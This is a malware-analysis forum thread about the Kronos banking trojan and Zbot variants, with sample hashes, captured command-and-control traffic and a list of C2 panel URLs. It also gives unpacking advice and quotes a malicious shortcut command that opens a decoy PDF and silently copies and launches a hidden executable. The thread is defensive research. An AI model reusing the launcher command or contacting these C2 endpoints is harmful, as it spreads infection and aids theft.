Kronos

Forum for analysis and discussion about malware.

Kronos

Postby Intimacygel » Tue Jul 15, 2014 1:49 pm

Hi All,

Was wondering if anyone has heard of or seen samples of the supposedly replacement for zeus "kronos"

http://www.csoonline.com/article/245363 ... um=twitter


Thanks!
User avatar
Intimacygel
 
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm
Reputation point: 4

Re: Kronos

Postby Sargerras » Tue Aug 05, 2014 9:30 am

Hi, just show up this thread.
http://securityblog.s21sec.com/2014/08/ ... -here.html

Sample of kronos attached

MD5: f085395253a40ce8ca077228c2322010
www.virustotal.com/file/9806d1b664c7371 ... /analysis/
You do not have the required permissions to view the files attached to this post.
Sargerras
 
Posts: 9
Joined: Mon May 13, 2013 12:23 pm
Reputation point: 3

Re: Kronos

Postby Kafeine » Tue Jan 27, 2015 6:57 pm

A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
You do not have the required permissions to view the files attached to this post.
Kafeine
 
Posts: 105
Joined: Thu Jul 28, 2011 1:19 pm
Reputation point: 74

Variant of Zbot

Postby pwnslinger » Wed Nov 25, 2015 6:50 pm

Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:
You do not have the required permissions to view the files attached to this post.
pwnslinger
 
Posts: 9
Joined: Mon May 04, 2015 5:27 pm
Reputation point: 0

Re: Variant of Zbot

Postby comak » Thu Nov 26, 2015 11:14 am

This is Kronos,

Code: Select all
http://bitcoind.su:80/krpanel/connect.php
http://bulletvpn.su:80/krpanel/connect.php
http://thereturn15.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php
http://cyberhosting.su:80/krpanel/connect.php
http://skycard.su:80/krpanel/connect.php


cheers,
mak
comak
 
Posts: 43
Joined: Mon Oct 14, 2013 8:25 am
Reputation point: 31

Re: Variant of Zbot

Postby EP_X0FF » Thu Nov 26, 2015 11:33 am

pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:


As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4764
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 571

Re: Kronos

Postby henices » Thu Dec 03, 2015 2:13 am

Kafeine wrote:A fresh one (pushed in Sweet Orange).

01/27/2015-08:15:33.214071 bitcoind.su [**] /krpanel/connect.php [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 89 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80
01/27/2015-08:15:34.625277 bitcoind.su [**] /krpanel/connect.php?a=1 [**] Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0) [**] <no referer> [**] POST [**] HTTP/1.1 [**] 200 [**] 41 bytes [**] 192.168.[xx]:1035 -> 92.87.96.9:80


Code: Select all
POST /krpanel/connect.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Trident/6.0)
Host: bitcoind.su
Content-Length: 74
Cache-Control: no-cache 

WzW,c`cfgcgzcozccazedzeefdfdb*W


attachment is the report.
You do not have the required permissions to view the files attached to this post.
henices
 
Posts: 3
Joined: Fri Aug 01, 2014 7:29 am
Reputation point: 0

Re: Variant of Zbot

Postby pwnslinger » Thu Dec 03, 2015 8:07 pm

EP_X0FF wrote:
pwnslinger wrote:Hi,
using VB6 packing method, execute shellcode which is packed by MoleBox or sth like that (PUSHAD, CALL).
but i dunno why i just got into this loop. enumerates through all procedure names...
hint me plz

sample also attached below:


As with most of malware crypters used for ZBot it "decryption" based on moment when RunPE executed. Set break on CreateProcess and dump memory region it will attempt to write to the zombie target process.

https://www.virustotal.com/en/file/e4e0 ... 448537374/

"Unpacked" Kronos in attach. Posts moved.


Thanks EP. ;)

after dumping second stage (explorer.exe) (change EP with PUSH/RET) using EBFE method for attaching using ollydbg.
i dunno why when i wanna set toggle bp on code, olly can't and run (memry regions are RWC!)
then i used f4 (run till selection) and hw bp.
but when call SYSENTER... i can't take control back to myself.
You do not have the required permissions to view the files attached to this post.
pwnslinger
 
Posts: 9
Joined: Mon May 04, 2015 5:27 pm
Reputation point: 0

Re: Kronos

Postby pwnslinger » Fri Feb 12, 2016 10:27 am

i got another variant of Zbot on my system today.
.rsrc section is base64 encoded. first i thought about Ranbyus banking trojan.
also a shortcut created for running malware with this content:

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "start %cd%Statically_detecting_use_after_free_on_binary_code.pdf & attrib -s -h %cd%DqGLtNo.exe & xcopy /F /S /Q /H /R /Y %cd%DqGLtNo.exe %temp%\JHQtm\ & attrib +s +h %cd%DqGLtNo.exe & start %temp%\JHQtm\Dq

export table contains callback function. i checked it by Ida and i didn't see any useful call.
where i should start?


sample attached.
You do not have the required permissions to view the files attached to this post.
pwnslinger
 
Posts: 9
Joined: Mon May 04, 2015 5:27 pm
Reputation point: 0

Re: Kronos

Postby puzzlex » Fri Feb 12, 2016 1:18 pm

This DqGLtNo.exe is packed multiple times. Here it is the final payload https://www.virustotal.com/en/file/18f8 ... /analysis/
You do not have the required permissions to view the files attached to this post.
puzzlex
 
Posts: 20
Joined: Tue Oct 20, 2015 12:22 pm
Reputation point: 2

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 8 guests